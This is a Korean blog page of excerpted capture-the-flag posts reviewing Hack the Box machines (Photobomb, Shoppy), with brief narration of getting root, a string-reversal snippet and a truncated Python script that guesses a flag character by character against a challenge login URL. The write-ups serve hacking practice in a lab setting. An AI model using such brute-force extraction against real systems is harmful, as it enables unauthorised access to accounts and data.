논리적인 사색가의 글쓰기여행

Hack the box의 좋은 콘텐츠들을 참고해주시면 감사하겠습니다 위에 나오는 사진들은 모두 제가 Hack the box 의 챌린지들을 실습하여 캡쳐한 사진들입니다

hack the box의 photobomb입니다 active이므로 최대한 힌트가 될 만한 내용은 미리 삭제하였음을 밝힙니다. curl을 이용하여 단서를 추적합니다. 단서가 나왔으니 파고 들어야겠죠? 으음 사실 사진 같은 거 나올 때마다 약간 본능적으로 스테가노그래피 등도 고려해보곤 합니다 근데 이 문제에서 그런 걸 낸다면 솔직히 개연성이 많이 떨어지겠죠 그래서 일단 그 가능성을 무시해봤습니다 오호라 공격 벡터가 보이는군요 들어가 봅니다 오호라 거의 다 왔군요 wizard로 내부 네트워크까지 침입했습니다 간단하게 root 계정을 얻고 마무리~!~! %*$@%@$^#$*$%*%^&%^*%*&&* 쉽네용 그리고 재미있습니댜

p = input() print(f'p : {p}') p_list = list(p) p_list.reverse() p = ''.join(p_list) print(f'거꾸로 : {p}') k = input() m = '' for c in k: m = c + m print(m)

어 이건 군필자...? 이미 명령어를 쳐서 캡쳐하기 위해서 다시 불러옴 참 쉽죠?

TryHackme가 굉장히 탄탄한 교육 내용으로 이루어져있다면 Hack the box는 그런 모든 내용들을 직접 실습하기 좋게끔 되어 있다. 굉장히 문제 수도 다양하고 알찬 내용들이 많아서 해킹을 정말 제대로 기반부터 다져나가고 싶은 친구라면 Tryhakcme랑 Hack the box를 둘 다 추천하는 입장이다. 둘 중 하나만 하는 것보다 사실 두 개를 동시에 할 때 더 좋은 효과를 볼 수 있다. 그럼 hack the box shoppy 문제를 리뷰해보자. active 문제이므로 너무 깊이 다루거나 직접적인 내용을 다루지는 않을 것이다. 전체적으로 플래그를 얻는 과정을 리뷰해보자. 위에 건 너무 기본이니까 설명은 스킵 admin hash 가 나왔다 그리고 josh hash도 얻을 수 있었다. 사실 여기까..

import requests import string headers = {"UserAgent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"} url = "http://159.65.63.151:31293/login" chars = string.ascii_letters chars += ''.join(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '`', '~', '!', '@', '$', '%', '&', '-', '_', "'"]) counter = 0 flag = "HTB{" while True: if counter == len(chars): print(fl..

저는 딱히 원하는 게 없네요